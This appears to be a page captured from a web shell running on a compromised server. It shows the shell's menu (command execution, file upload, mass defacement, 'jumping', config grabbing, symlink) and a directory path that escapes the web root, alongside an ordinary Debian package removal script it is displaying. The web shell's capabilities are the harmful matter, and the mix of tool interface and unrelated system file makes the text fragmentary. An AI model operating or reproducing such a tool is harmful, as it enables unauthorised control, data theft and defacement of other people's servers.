OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/../lib/dpkg/info/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh set -e if [ "$1" = "remove" ] || [ "$1" = "disappear" ]; then update-alternatives --remove jsondiff /usr/bin/python3-jsondiff update-alternatives --remove jsondiff /usr/bin/jsonpatch-jsondiff update-alternatives --remove jsonpatch /usr/bin/python3-jsonpatch fi exit 0